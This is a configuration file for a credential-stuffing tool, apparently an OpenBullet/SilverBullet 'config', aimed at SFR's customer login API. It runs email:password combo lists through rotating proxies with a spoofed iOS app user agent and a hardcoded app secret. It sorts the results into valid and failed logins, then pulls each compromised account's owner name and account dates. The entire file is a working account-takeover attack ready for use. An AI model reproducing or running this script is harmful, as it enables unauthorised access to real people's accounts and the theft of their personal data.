[SETTINGS]
{
  "Name": "SFR & MOI API",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-09T15:49:00.8943851+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "SFR & MOI API",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#1 FUNCTION RandomString "?m?m?m?m?m?m?m?m-?m?m?m?m-4?m?m?m-?m?m?m?m-?m?m?m?m?m?m?m?m?m?m?m?m" -> VAR "1" 

#2 FUNCTION Base64Encode "apple | iPhone11 | <1>" -> VAR "2" 

#3 FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "OK" 

#LOGIN REQUEST GET "https://www.sfr.fr/cas/services/rest/3.2/createToken.json?duration=72000" 
  
  HEADER "Host: www.sfr.fr" 
  HEADER "Accept: */*" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept-Encoding: gzip;q=1.0, compress;q=0.5" 
  HEADER "Connection: keep-alive" 
  HEADER "fingerprint: <2>" 
  HEADER "secret: Basic U0ZSRVRNb2lJT1NWMTpjaGFtcGlvbnMyMDE5" 
  HEADER "User-Agent: SFRMonCompte/10.2.2 (fr.sfr.SFRMonCompte; build:20220217224700; iOS 15.3.1) Alamofire/10.2.2" 
  HEADER "Authorization: Basic <OK>" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Accept-Language: en-LB;q=1.0, ar-LB;q=0.9" 

#KEY_CHECEK KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"token\":\"" 
  KEYCHAIN Failure OR 
    KEY "Bad credentials for login" 
    KEY "Account locked for login" 
    KEY "BAD_CREDENTIALS_EXCEPTION" 

#TK PARSE "<SOURCE>" JSON "token" -> VAR "TK" 

#SFR&MOI REQUEST GET "https://www.sfr.fr/webservices/userprofile/rest/moncompte/530" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "casauthenticationtoken: <TK>" 

#FIRST PARSE "<SOURCE>" LR "\"prenom\" : \"" "\"" -> VAR "F" 

#LAST PARSE "<SOURCE>" LR "\"nom\" : \"" "\"" -> VAR "L" 

#NAME FUNCTION Constant "<F> <L>" -> CAP "Name" 

#DateActivation PARSE "<SOURCE>" LR "\"dateActivation\" : \"" " " CreateEmpty=FALSE -> CAP "DateActivation" 

#DateCreation PARSE "<SOURCE>" LR " \"dateCreation\" : \"" " " CreateEmpty=FALSE -> CAP "DateCreation" 

#FREE KEYCHECK 
  KEYCHAIN Success OR 
    KEY "codeProduit" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "codeProduit" 

#AUTHOR FUNCTION Constant "@uzzzul" -> CAP "configby" 

